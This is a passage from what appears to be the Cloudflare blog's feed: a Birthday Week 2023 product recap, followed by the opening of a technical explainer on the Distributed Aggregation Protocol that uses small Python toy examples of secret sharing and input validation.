    <p>There is no doubt that data science is <a href="/best-place-region-earth-inference/">evolving our business</a> and the <a href="/ai-companies-building-cloudflare/">businesses of our customers</a>. We improve our own products with models, and have built <a href="/announcing-ai-gateway/">AI infrastructure</a> that can help us <a href="https://www.cloudflare.com/application-services/solutions/">secure applications</a> and <a href="/secure-generative-ai-applications/">applications built with AI</a>. We can leverage the <a href="/workers-ai/">power of our network to deliver AI</a> for us and our customers. We have partnered with <a href="/partnering-with-hugging-face-deploying-ai-easier-affordable/">machine</a> <a href="https://www.cloudflare.com/press-releases/2023/cloudflare-partners-with-databricks">learning</a> <a href="https://www.cloudflare.com/press-releases/2023/cloudflare-and-meta-collaborate-to-make-llama-2-available-globally">giants</a> to make it easier for the data science community to deliver real value from data.</p><p>The call to action is this: join the <a href="https://discord.com/invite/cloudflaredev">Cloudflare community</a> in bringing modern software practices and tools to data science. Be on the lookout for more data science from Cloudflare. Help us securely leverage data to help build a better Internet.</p> ]]></content:encoded>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Data]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[MLops]]></category>
            <category><![CDATA[Hardware]]></category>
            <guid isPermaLink="false">1NOp4Ep4CYMxL6OYRa2FaU</guid>
            <dc:creator>Keith Adler</dc:creator>
            <dc:creator>Rio Harapan Pangihutan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Birthday Week recap: everything we announced — plus an AI-powered opportunity for startups]]></title>
            <link>https://blog.cloudflare.com/birthday-week-2023-wrap-up/</link>
            <pubDate>Mon, 02 Oct 2023 13:00:24 GMT</pubDate>
            <description><![CDATA[ Need a recap or refresher on all the big Birthday Week news this week? This recap has you covered ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3xrCvUVi0SgWrjDPrwi77i/2097296d3db2c219c5e0e904fe19adfb/image1-45.png" />
            
            </figure><p>This year, Cloudflare officially became a teenager, turning 13 years old. We celebrated this milestone with a series of announcements that benefit both our customers and the Internet community.</p><p>From developing applications in the age of AI to securing against the most advanced attacks that are yet to come, Cloudflare is proud to provide the tools that help our customers stay one step ahead.</p><p>We hope you’ve had a great time following along, and for anyone looking for a recap of everything we launched this week, here it is:</p>
    <div>
      <h3>Monday</h3>
      <a href="#monday">
        
      </a>
    </div>
    <table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>What</span></p></td><td><p><span>In a sentence…</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/switching-cloudflare-cut-your-network-carbon-emissions-sbti/"><span>Switching to Cloudflare can cut emissions by up to 96%</span></a></p></td><td><p><span>Switching enterprise network services from on-prem to Cloudflare can cut related carbon emissions by up to 96%. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/traffic-transparency-unleashing-cloudflare-trace/"><span>Cloudflare Trace</span></a></p></td><td><p><span>Use Cloudflare Trace to see which rules and settings are invoked when an HTTP request for your site goes through our network. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-fonts-enhancing-website-privacy-speed/"><span>Cloudflare Fonts</span></a></p></td><td><p><span>Introducing Cloudflare Fonts. Enhance privacy and performance for websites using Google Fonts by loading fonts directly from the Cloudflare network. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/meet-traffic-manager/"><span>How Cloudflare intelligently routes traffic</span></a></p></td><td><p><span>Technical deep dive that explains how Cloudflare uses machine learning to intelligently route traffic through our vast network. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-stream-low-latency-hls-open-beta/"><span>Low Latency Live Streaming</span></a></p></td><td><p><span>Cloudflare Stream’s LL-HLS support is now in open beta. You can deliver video to your audience faster, reducing the latency a viewer may experience on their player to as little as 3 seconds. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/permissions-best-practices/"><span>Account permissions for all</span></a></p></td><td><p><span>Cloudflare account permissions are now available to all customers, not just Enterprise. In addition, we’ll show you how to use them, along with best practices. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/incident-alerts/"><span>Incident Alerts</span></a></p></td><td><p><span>Customers can subscribe to Cloudflare Incident Alerts and choose when to get notified based on affected products and level of impact. </span></p></td></tr></tbody></table>
    <div>
      <h3>Tuesday</h3>
      <a href="#tuesday">
        
      </a>
    </div>
    <table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>What</span></p></td><td><p><span>In a sentence…</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/welcome-to-connectivity-cloud/"><span>Welcome to the connectivity cloud</span></a></p></td><td><p><span>Cloudflare is the world’s first connectivity cloud — the modern way to connect and protect your cloud, networks, applications and users. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/amazon-2bn-ipv4-tax-how-avoid-paying/"><span>Amazon’s $2bn IPv4 tax — and how you can avoid paying it</span></a><span> </span></p></td><td><p><span>Amazon will begin taxing their customers $43 for IPv4 addresses, so Cloudflare will give those $43 back in the form of credits to bypass that tax. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/sippy-incremental-migration-s3-r2/"><span>Sippy</span></a></p></td><td><p><span>Minimize egress fees by using Sippy to incrementally migrate your data from AWS to R2. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/merging-images-and-image-resizing/"><span>Cloudflare Images</span></a></p></td><td><p><span>All Image Resizing features will be available under Cloudflare Images and we’re simplifying pricing to make it more predictable and reliable. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/traffic-anomalies-notifications-radar/"><span>Traffic anomalies and notifications with Cloudflare Radar</span></a></p></td><td><p><span>Cloudflare Radar will be publishing anomalous traffic events for countries and Autonomous Systems (ASes).</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/detecting-internet-outages/"><span>Detecting Internet outages</span></a></p></td><td><p><span>Deep dive into how Cloudflare detects Internet outages, the challenges that come with it, and our approach to overcome these problems. </span></p></td></tr></tbody></table>
    <div>
      <h3>Wednesday</h3>
      <a href="#wednesday">
        
      </a>
    </div>
    <table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>What</span></p></td><td><p><span>In a sentence…</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/best-place-region-earth-inference/"><span>The best place on Region: Earth for inference</span></a></p></td><td><p><span>Now available: Workers AI, a serverless GPU cloud for AI, Vectorize so you can build your own vector databases, and AI Gateway to help manage costs and observability of your AI applications. </span></p><p><span>Cloudflare delivers the best infrastructure for next-gen AI applications, supported by partnerships with NVIDIA, Microsoft, Hugging Face, Databricks, and Meta.</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/workers-ai/"><span>Workers AI </span></a></p></td><td><p><span>Launching Workers AI — AI inference as a service platform, empowering developers to run AI models with just a few lines of code, all powered by our global network of GPUs. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/partnering-with-hugging-face-deploying-ai-easier-affordable/"><span>Partnering with Hugging Face </span></a></p></td><td><p><span>Cloudflare is partnering with Hugging Face to make AI models more accessible and affordable to users. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/vectorize-vector-database-open-beta/"><span>Vectorize</span></a></p></td><td><p><span>Cloudflare’s vector database, designed to allow engineers to build full-stack, AI-powered applications entirely on Cloudflare's global network — available in Beta. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/announcing-ai-gateway/"><span>AI Gateway</span></a></p></td><td><p><span>AI Gateway helps developers have greater control and visibility in their AI apps, so that you can focus on building without worrying about observability, reliability, and scaling. AI Gateway handles the things that nearly all AI applications need, saving you engineering time.</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/webgpu-in-workers/"><span>You can now use WebGPU in Cloudflare Workers</span></a></p></td><td><p><span>Developers can now use WebGPU in Cloudflare Workers. Learn more about why WebGPUs are important, why we’re offering them to customers, and what’s next. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/ai-companies-building-cloudflare/"><span>What AI companies are building with Cloudflare</span></a></p></td><td><p><span>Many AI companies are using Cloudflare to build next generation applications. Learn more about what they’re building and how Cloudflare is helping them on their journey. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/writing-poems-using-llama-2-on-workers-ai/"><span>Writing poems using LLama 2 on Workers AI</span></a></p></td><td><p><span>Want to write a poem using AI? Learn how to run your own AI chatbot in 14 lines of code, running on Cloudflare’s global network. </span></p></td></tr></tbody></table>
    <div>
      <h3>Thursday</h3>
      <a href="#thursday">
        
      </a>
    </div>
    <table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>What</span></p></td><td><p><span>In a sentence…</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/hyperdrive-making-regional-databases-feel-distributed/"><span>Hyperdrive</span></a></p></td><td><p><span>Cloudflare launches a new product, Hyperdrive, that makes existing regional databases much faster by dramatically speeding up queries that are made from Cloudflare Workers.</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/d1-open-beta-is-here/"><span>D1 Open Beta</span></a></p></td><td><p><span>D1 is now in open beta, and the theme is “scale”: with higher per-database storage limits and the ability to create more databases, we’re unlocking the ability for developers to build production-scale applications on D1.</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/race-ahead-with-build-caching/"><span>Pages Build Caching</span></a></p></td><td><p><span>Build cache is a feature designed to reduce your build times by caching and reusing previously computed project components — now available in Beta. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/running-serverless-puppeteer-workers-durable-objects/"><span>Running serverless Puppeteer with Workers and Durable Objects</span></a></p></td><td><p><span>Introducing the Browser Rendering API, which enables developers to utilize the Puppeteer browser automation library within Workers, eliminating the need for serverless browser automation system setup and maintenance.</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-now-powering-microsoft-edge-secure-network/"><span>Cloudflare partners with Microsoft to power their Edge Secure Network</span></a></p></td><td><p><span>We partnered with Microsoft Edge to provide a fast and secure VPN, right in the browser. Users don’t have to install anything new or understand complex concepts to get the latest in network-level privacy: Edge Secure Network VPN is available on the latest consumer version of Microsoft Edge in most markets, and automatically comes with 5GB of data. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/workers-playground/"><span>Re-introducing the Cloudflare Workers playground</span></a></p></td><td><p><span>We are revamping the playground that demonstrates the power of Workers, along with new development tooling, and the ability to share your playground code and deploy instantly to Cloudflare’s global network.</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-integrations-marketplace-new-partners-sentry-momento-turso/"><span>Cloudflare integrations marketplace expands</span></a></p></td><td><p><span>Introducing the newest additions to Cloudflare’s Integration Marketplace. Now available: Sentry, Momento and Turso. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/socket-api-works-javascript-runtimes-wintercg-polyfill-connect/"><span>A Socket API that works across JavaScript runtimes — announcing a WinterCG spec and polyfill for connect()</span></a></p></td><td><p><span>Engineers from Cloudflare and Vercel have published a draft specification of the connect() sockets API for review by the community, along with a Node.js compatible polyfill for the connect() API that developers can start using.</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/workers-pricing-scale-to-zero/"><span>New Workers pricing</span></a></p></td><td><p><span>Announcing new pricing for Cloudflare Workers, where you are billed based on CPU time, and never for the idle time that your Worker spends waiting on network requests and other I/O.</span></p></td></tr></tbody></table>
    <div>
      <h3>Friday</h3>
      <a href="#friday">
        
      </a>
    </div>
    <table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>What</span></p></td><td><p><span>In a sentence…</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/post-quantum-cryptography-ga/"><span>Post Quantum Cryptography goes GA</span></a><span> </span></p></td><td><p><span>Cloudflare is rolling out post-quantum cryptography support to customers, services, and internal systems to proactively protect against advanced attacks. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/announcing-encrypted-client-hello/"><span>Encrypted Client Hello</span></a></p></td><td><p><span>Announcing a contribution that helps improve privacy for everyone on the Internet. Encrypted Client Hello, a new standard that prevents networks from snooping on which websites a user is visiting, is now available on all Cloudflare plans. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/threats-lurking-office-365-cloudflare-email-retro-scan/"><span>Email Retro Scan</span></a><span> </span></p></td><td><p><span>Cloudflare customers can now scan messages within their Office 365 inboxes for threats. The Retro Scan will let you look back seven days to see what threats your current email security tool has missed. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/turnstile-ga/"><span>Turnstile is Generally Available</span></a></p></td><td><p><span>Turnstile, Cloudflare’s CAPTCHA replacement, is now generally available, free for everyone, and includes unlimited use. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/ai-bots/"><span>AI crawler bots</span></a></p></td><td><p><span>Any Cloudflare user, on any plan, can choose specific categories of bots that they want to allow or block, including AI crawlers. We are also recommending a new robots.txt standard that will make it easier for websites to clearly direct how AI bots can and can’t crawl.</span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/detecting-zero-days-before-zero-day/"><span>Detecting zero-days before zero-day</span></a></p></td><td><p><span>Deep dive into Cloudflare’s approach and ongoing research into detecting novel web attack vectors in our WAF before they are seen by a security researcher. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/deep-dive-privacy-preserving-measurement/"><span>Privacy Preserving Metrics</span></a></p></td><td><p><span>Deep dive into the fundamental concepts behind the Distributed Aggregation Protocol (DAP) with examples of how we’ve implemented it in Daphne, our open source aggregator server. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/post-quantum-to-origins/"><span>Post-quantum cryptography to origin</span></a></p></td><td><p><span>We are rolling out post-quantum cryptography support for outbound connections to origins and Cloudflare Workers fetch() calls. Learn more about what we enabled, how we rolled it out in a safe manner, and how you can add support to your origin server today. </span></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/network-performance-update-birthday-week-2023/"><span>Network performance update</span></a></p></td><td><p><span>Cloudflare’s updated benchmark results regarding network performance, plus a dive into the tools and processes that we use to monitor and improve our network performance. </span></p></td></tr></tbody></table>
    <div>
      <h3>One More Thing</h3>
      <a href="#one-more-thing">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1e1X3l01L7kc5DgRUgAoU5/76d3d1955e15044bbbd14c57ee05877c/image1-51.png" />
            
            </figure><p>When Cloudflare turned 12 last year, we announced the <a href="https://www.cloudflare.com/lp/workers-launchpad/">Workers Launchpad Funding Program</a> - you can think of it like a startup accelerator program for companies building on Cloudflare’s Developer Platform, with no restrictions on your size, stage, or geography.</p><p><b>A refresher on how the Launchpad works:</b> Each quarter, we admit a group of startups who then get access to a wide range of technical advice, mentorship, and fundraising opportunities. That includes our Founders Bootcamp, Open Office Hours with our Solution Architects, and Demo Day. Those who are ready to fundraise will also be connected to our community of 40+ leading global Venture Capital firms.</p><p>In exchange, we just ask for your honest feedback. We want to know what works, what doesn’t, and what you need us to build for you. We don’t ask for a stake in your company, and we don’t ask you to pay to be a part of the program.</p><blockquote><p>Targum (my startup) was one of the first AI companies (w/ <a href="https://twitter.com/jamdotdev?ref_src=twsrc%5Etfw">@jamdotdev</a> ) in the Cloudflare workers launchpad!</p><p>In return to tons of stuff we got from CF 🙏 they asked for feedback, and my main one was, let me do everything end to end on CF, I don't want to rent GPU servers… <a href="https://t.co/0j2ZymXpsL">https://t.co/0j2ZymXpsL</a></p><p>— Alex Volkov (@altryne) <a href="https://twitter.com/altryne/status/1707034613699547433?ref_src=twsrc%5Etfw">September 27, 2023</a></p></blockquote><p>Over the past year, we’ve received applications from nearly 60 different countries. 
We’ve had a chance to work closely with 50 amazing early and growth-stage startups admitted into the first two cohorts, and have grown our VC partner community to 40+ firms and more than $2 billion in potential investments in startups building on Cloudflare.</p><p><b>Next up: Cohort #3!</b> Between recently wrapping up Cohort #2 (check out their <a href="https://cloudflare.tv/shows/workers-launchpad-demo-day/workers-launchpad-demo-day-cohort-2/3vVqLOgq">Demo Day</a>!), celebrating the Launchpad’s 1st birthday, and the heaps of announcements we made last week, we thought that everyone could use a little extra time to catch up on all the news - which is why we are extending the deadline for Cohort #3 a few weeks to <b>October 13, 2023. AND</b> we’re <b>reserving 5 spots in the class for those who are already using any of last Wednesday’s AI announcements.</b> Just be sure to mention what you’re using in your application.</p><p>So once you’ve had a chance to check out the announcements and pour yourself a cup of coffee, check out the <a href="https://www.cloudflare.com/lp/workers-launchpad/"><b>Workers Launchpad</b></a>. Applying is a breeze — you’ll be done long before your coffee gets cold.</p>
    <div>
      <h3>Until next time</h3>
      <a href="#until-next-time">
        
      </a>
    </div>
    <p>That’s all for Birthday Week 2023. We hope you enjoyed the ride, and we’ll see you at our next innovation week!</p><blockquote><p>i hate <a href="https://twitter.com/Cloudflare?ref_src=twsrc%5Etfw">@Cloudflare</a> launch week</p><p>most launch weeks are underwhelming</p><p>cloudflare always makes me rethink everything i’m doing</p><p>— Dax (@thdxr) <a href="https://twitter.com/thdxr/status/1707575791234560377?ref_src=twsrc%5Etfw">September 29, 2023</a></p></blockquote><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Turnstile]]></category>
            <category><![CDATA[CAPTCHA]]></category>
            <category><![CDATA[Research]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <category><![CDATA[D1]]></category>
            <category><![CDATA[Beta]]></category>
            <guid isPermaLink="false">7umrrlVzTKNvArNCqoQUSI</guid>
            <dc:creator>Dina Kozlov</dc:creator>
            <dc:creator>Mia Wang</dc:creator>
        </item>
        <item>
            <title><![CDATA[Privacy-preserving measurement and machine learning]]></title>
            <link>https://blog.cloudflare.com/deep-dive-privacy-preserving-measurement/</link>
            <pubDate>Fri, 29 Sep 2023 13:00:45 GMT</pubDate>
            <description><![CDATA[ Cloudflare is implementing DAP (Distributed Aggregation Protocol) – a way of using multi-party computation to aggregate data without exposing individual measurements. ]]></description>
            <content:encoded><![CDATA[ <p>In 2023, data-driven approaches to making decisions are the norm. We use data for everything from analyzing x-rays to translating thousands of languages to directing autonomous cars. However, when it comes to building these systems, the conventional approach has been to collect as much data as possible, and worry about privacy as an afterthought.</p><p>The problem is, data can be sensitive and used to identify individuals – even when explicit <a href="https://dataprivacylab.org/projects/identifiability/paper1.pdf">identifiers are removed</a> or noise is added.</p><p>Cloudflare Research has been interested in exploring different approaches to this question: is there a <i>truly private</i> way to perform data collection, especially for some of the most sensitive (but incredibly useful!) technology?</p><p>Some of the use cases we’re thinking about include: training federated <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning models</a> for predictive keyboards without collecting every user’s keystrokes; performing <a href="https://www.census.gov/data/academy/webinars/2021/disclosure-avoidance-series/simulated-reconstruction-abetted-re-identification-attack-on-the-2010-census.html">a census</a> without storing data about individuals’ responses; <a href="https://covid19-static.cdn-apple.com/applications/covid19/current/static/contact-tracing/pdf/ENPA_White_Paper.pdf">providing healthcare authorities with data about COVID-19 exposures without tracking people’s locations en masse</a>; figuring out the most common errors browsers are experiencing without reporting which websites users are visiting. 
</p><p>It’s with those use cases in mind that we’ve been participating in the Privacy Preserving Measurement <a href="https://datatracker.ietf.org/group/ppm/about/">working group at the IETF</a> whose goal is to develop systems for collecting and using this data while minimizing the amount of per-user information exposed to the data collector.</p><p>So far, the most promising standard in this space is <a href="https://datatracker.ietf.org/doc/draft-ietf-ppm-dap/">DAP – Distributed Aggregation Protocol</a> – a clever way to use <a href="https://en.wikipedia.org/wiki/Secure_multi-party_computation">multi-party computation</a> to aggregate data without exposing individual measurements. Early versions of the algorithms used by DAP have been implemented by Google and Apple for <a href="https://covid19-static.cdn-apple.com/applications/covid19/current/static/contact-tracing/pdf/ENPA_White_Paper.pdf">exposure notifications</a>.</p><p>In this blog post, we’ll do a deep dive into the fundamental concepts behind the DAP protocol and give an example of how we’ve implemented it into <a href="https://github.com/cloudflare/daphne">Daphne</a>, our open source aggregator server. We hope this will inspire others to collaborate with us and get involved in this space!</p>
    <div>
      <h3>The principles behind DAP, an open standard for privacy preserving measurement</h3>
      <a href="#the-principles-behind-dap-an-open-standard-for-privacy-preserving-measurement">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Y8EEQM4c3MgIDKhYnp09B/c7626358f569efcd509c4571ff3fc409/MAnxtCSIuR-Y9c_2OkGchGPEHA_U4feb9db_mXD1BOWpc5cMy25ggAgcGg_Ir-8lkU6kCXkLIyq8M25cxxBmPksZL1EIrlsHErLD7rpZXvMxnRdeLmWdavhLIGww.png" />
            
            </figure><p>At a high level, using the DAP protocol forces us to think in terms of <i>data minimization</i>: collect only the data that we use and nothing more. Abstractly, our goal is to devise a system with which a data collector can compute some function \( f(m_{1},...,m_{N}) \) of measurements \( m_{1},...,m_{N} \) uploaded by users without observing the measurements in the clear.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/qDmuIUgKzPXskT39UdfKf/17309b04fd740935c53fe01be8f4b11c/image12-3.png" />
            
            </figure><p><i>Alice wants to know some aggregate statistic – like the average salary of the people at the party – without knowing how much each individual person makes.</i></p><p>This may at first seem like an impossible task: to compute on data without knowing the data we're computing on. Nevertheless, as is often the case in cryptography, once we've properly constrained the problem, solutions begin to emerge.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5nMLQ0GblS8fPnWGtfm2oM/36cc8266ab7f74a7240d3aa266d26790/image9-2.png" />
            
</figure><p><i>Strawperson solution: delegate the calculation to a trusted third party, Bob. The problem with this is that Bob can see the private inputs in the clear.</i></p><p>In an ideal world (see above), there would be some server somewhere on the Internet that we could trust to consume measurements, aggregate them, and send the result to the data collector without ever disclosing anything else. However, in reality there's no reason for users to trust such a server more than the data collector; indeed, both are subject to the usual assortment of attacks that can lead to a data breach.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6axqzCL6WF50qNFJu3qMT5/3781cd288e80cd53be27ad090ad52082/image1-42.png" />
            
</figure><p><i>MPC solution: secret-share the inputs across multiple parties, a.k.a. Bob and Daphne. If at least one party is honest, Alice gets the aggregate result without anyone seeing individual inputs in the clear.</i></p><p>Instead, what we do in DAP is <i>distribute</i> the computation across the servers such that no single server has a complete measurement. The key idea that makes this possible is <i>secret sharing</i>.</p>
    <div>
      <h2>Computing on secret shared data</h2>
      <a href="#computing-on-secret-shared-data">
        
      </a>
    </div>
    <p>To set things up, let's make the problem a little more concrete. Suppose each measurement \( m_{i} \) is a number and our goal is to compute the sum of the measurements. That is, \( f(m_{1},...,m_{N}) = m_{1} + \cdots + m_{N} \). Our goal is to use secret sharing to allow two servers, which we'll call <i>aggregators</i>, to jointly compute this sum.</p><p>To understand secret sharing, we're going to need a tiny bit of math—modular arithmetic. The expression \( X + Y \ (\textrm{mod}\ q) \) means "add \( X \) and \( Y \), then divide the sum by \( q \) and return the remainder". For now the modulus \( q \) can be any large number, as long as it's larger than any sum we'd ever want to compute (\( 2^{64} \), say). In the remainder of this section, we'll omit \( q \) and simply write \( X + Y \) for addition modulo \( q \).</p><p>The goal of secret sharing is to shard a measurement (i.e., a "secret") into two "shares" such that (i) the measurement can be recovered by combining the shares together and (ii) neither share leaks any information about the measurement. To secret share each \( m_{i} \), we choose a random number \( R_{i} \in \lbrace 0,...,q - 1\rbrace \), set the first share to be \( X_{i} = m_{i} - R_{i} \) and set the other share to be \( Y_{i} = R_{i} \). To recover the measurement, we simply add the shares together. This works because \( X_{i} + Y_{i} = (m_{i} - R_{i}) + R_{i} = m_{i} \). Moreover, each share is indistinguishable from a random number: for example, \( 1337 \) might be secret-shared into \( 11419752798245067454 \) and \( 7026991275464485499 \) (modulo \( q = 2^{64} \)).</p><p>With this scheme we can devise a simple protocol for securely computing the sum:</p><ol><li><p>Each client shards its measurement \( m_{i} \) into \( X_{i} \) and \( Y_{i} \) and sends one share to each server.</p></li><li><p>The first aggregator computes \( X = X_{1} + \cdots + X_{N} \) and reveals \( X \) to the data collector. The second aggregator computes \( Y = Y_{1} + \cdots + Y_{N} \) and reveals \( Y \) to the data collector.</p></li><li><p>The data collector unshards the result as \( r = X + Y \).</p></li></ol><p>This works because the secret shares are additive, and the order in which we add things up is irrelevant to the function we're computing:</p><p>\( r = m_{1} + \cdots + m_{N} \) // by definition<br>\( r = (m_{1} - R_{1}) + R_{1} + \cdots + (m_{N} - R_{N}) + R_{N} \) // apply sharding<br>\( r = (m_{1} - R_{1}) + \cdots + (m_{N} - R_{N}) + R_{1} + \cdots + R_{N} \) // rearrange the sum<br>\( r = X + Y \) // apply aggregation</p>
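<p>As a toy illustration of the protocol above (not the DAP wire format, and with no validity proofs), the sharding, aggregation, and unsharding steps can be sketched in a few lines of Python:</p>

```python
import secrets

Q = 2**64  # public modulus; must exceed any sum we would ever want to compute

def share(measurement: int) -> tuple[int, int]:
    """Split a measurement into two additive shares modulo Q."""
    r = secrets.randbelow(Q)
    return (measurement - r) % Q, r  # each share alone looks uniformly random

def aggregate(shares: list[int]) -> int:
    """Each aggregator sums only the shares it holds, modulo Q."""
    return sum(shares) % Q

# Three clients shard their measurements and send one share to each aggregator.
measurements = [1337, 42, 7]
x_shares, y_shares = zip(*(share(m) for m in measurements))

# Each aggregator reveals only its aggregate; the collector unshards the sum.
x, y = aggregate(list(x_shares)), aggregate(list(y_shares))
assert (x + y) % Q == sum(measurements)  # 1386, with no single party seeing any m_i
```

<p>Neither aggregator ever holds more than a list of uniformly random-looking numbers, yet the collector recovers the exact sum.</p>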
    <div>
      <h3>Rich data types</h3>
      <a href="#rich-data-types">
        
      </a>
    </div>
    <p>This basic template for secure aggregation was described in a paper from Henry Corrigan-Gibbs and Dan Boneh called <a href="https://www.usenix.org/conference/nsdi17/technical-sessions/presentation/corrigan-gibbs">"Prio: Private, Robust, and Scalable Computation of Aggregate Statistics"</a> (NSDI 2017). This paper is a critical milestone in DAP's history, as it showed that a wide variety of aggregation tasks (not just sums) can be solved within one simple protocol framework: Prio. With DAP, our goal in large part is to bring this framework to life.</p><p>All Prio tasks are instances of the same template. Measurements are encoded in a form that allows the aggregation function to be expressed as the sum of (shares of) the encoded measurements. For example:</p><ol><li><p>To get the arithmetic mean, we just divide the sum by the number of measurements.</p></li><li><p>Variance and standard deviation can be expressed as a simple function of the sum and the sum of squares (i.e., \( m_{i}, m_{i}^{2} \) for each \( i \)).</p></li><li><p>Quantiles (e.g., median) can be estimated reasonably well by mapping the measurements into buckets and aggregating the histogram.</p></li><li><p>Linear regression (i.e., finding a line of best fit through a set of data points) is a bit more complicated, but can also be expressed in the Prio framework.</p></li></ol><p>This degree of flexibility is essential for widespread adoption because it allows us to get the most value we can out of a relatively small amount of software. However, there are a couple of problems we still need to overcome, both of which entail some form of interaction.</p>
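<p>To make item 2 concrete, here is a short sketch (names and data are illustrative) of how a collector could recover the variance purely from the two aggregate sums it learns, without ever seeing an individual measurement:</p>

```python
def variance_from_sums(s1: float, s2: float, n: int) -> float:
    # Population variance: E[m^2] - (E[m])^2, computed only from the
    # aggregate sum (s1) and aggregate sum of squares (s2).
    mean = s1 / n
    return s2 / n - mean**2

# In the protocol, each client would upload shares of (m, m^2); the
# collector would only ever learn the two unsharded totals below.
measurements = [2.0, 4.0, 4.0, 4.0, 5.0, 5.0, 7.0, 9.0]
s1 = sum(measurements)                  # aggregate of m_i
s2 = sum(m * m for m in measurements)   # aggregate of m_i^2
print(variance_from_sums(s1, s2, len(measurements)))  # 4.0
```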
    <div>
      <h3>Input validation</h3>
      <a href="#input-validation">
        
      </a>
    </div>
    <p>The first problem is <i>input validation</i>. Software engineers, especially those of us who operate web services, know in our bones that validating inputs we get from clients is of paramount importance. (Never, <i>ever</i> stick a raw input you got from a client into an SQL query!) But if the inputs are secret shared, then there is no way for an aggregator to discern even a single bit of the measurement, let alone check that it has an expected value. (A secret share of a valid measurement and a number sampled randomly from \( \lbrace 0,...,q - 1 \rbrace \) look identical.) At least, not on its own.</p><p>The solution adopted by Prio (and the <a href="https://datatracker.ietf.org/doc/draft-irtf-cfrg-vdaf/">standard</a>, with some improvements) is a special kind of <a href="/introducing-zero-knowledge-proofs-for-private-web-attestation-with-cross-multi-vendor-hardware/"><i>zero-knowledge proof (ZKP)</i> system</a> designed to operate on secret shared data. The goal is for a prover to convince a verifier that a statement about some data it has committed to is true (e.g., the user has a valid hardware key), without revealing the data itself (e.g., which hardware key is in use).</p><p>Our setting is exactly the same, except that we're working on secret-shared data rather than committed data. Along with the measurement shares, the client sends shares of a validity proof; then during aggregation, the aggregators interact with one another in order to check the proof. (One round-trip over the network is required.)</p><p>A happy consequence of working with secret shared data is that proof generation and verification are much faster than for committed (or encrypted) data. This is mainly because we avoid the use of public-key cryptography (i.e., <a href="/a-relatively-easy-to-understand-primer-on-elliptic-curve-cryptography/">elliptic curves</a>) and are less constrained in how we choose cryptographic parameters. 
(We require the modulus \( q \) to be a prime number with a particular structure, but such primes are not hard to find.)</p>
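<p>To see why validation matters in the first place, here is a toy illustration (deliberately omitting Prio's proof system) of a single malicious client silently poisoning the aggregate. Because its shares look exactly like honest ones, neither aggregator can notice anything amiss:</p>

```python
import secrets

Q = 2**64

def share(m: int) -> tuple[int, int]:
    r = secrets.randbelow(Q)
    return (m - r) % Q, r

honest = [share(m) for m in (3, 1, 4)]
# A malicious client submits shares of an out-of-range value. Each share is
# still a uniformly random-looking number in {0, ..., Q-1}, so the aggregators
# cannot distinguish it from an honest contribution without a validity proof.
malicious = share(10**15)

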